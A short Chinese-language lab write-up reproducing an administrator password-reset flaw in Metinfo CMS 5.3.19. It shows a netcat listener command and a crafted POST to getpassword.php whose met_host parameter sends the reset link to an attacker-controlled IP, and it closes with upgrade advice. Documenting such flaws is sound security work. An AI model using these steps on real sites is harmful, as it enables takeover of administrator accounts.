Metinfo 5.3.19管理員密碼重置漏洞
操作系統:Windows 10專業版 kali linux
網站環境:UPUPW 5.3
使用工具:burpsuite 1.7 beta
漏洞分析
#密碼重置過程中驗證不嚴
#漏洞涉及到的幾個文件分別是:
admin/admin/getpassword.php
include/common.inc.php
include/jmail.php
include/export.func.php
安裝(請忽略我用QQ瀏覽器)
upupw默認數據賬戶密碼:root--root
漏洞復現
登陸localhost/metinfo/admin點擊忘記密碼
用burp抓包
在kali虛擬機上監聽80端口
nc -lvvp 80
kali機器上IP為192.168.43.15
在burp repeater中構造http請求發送
POST /metinfo/admin/admin/getpassword.php?met_host=192.168.43.15
這時候在我們kali監聽的80端口監聽到了密碼重置的鏈接
打開鏈接進入設置密碼界面
我這里好幾次沒有監聽到不知到是怎末回事重啟了kali就可以了(計算機玄學吧有時候得信)
漏洞建議:
升級CMS版本
二次開發中優化登陸代碼避免邏輯錯誤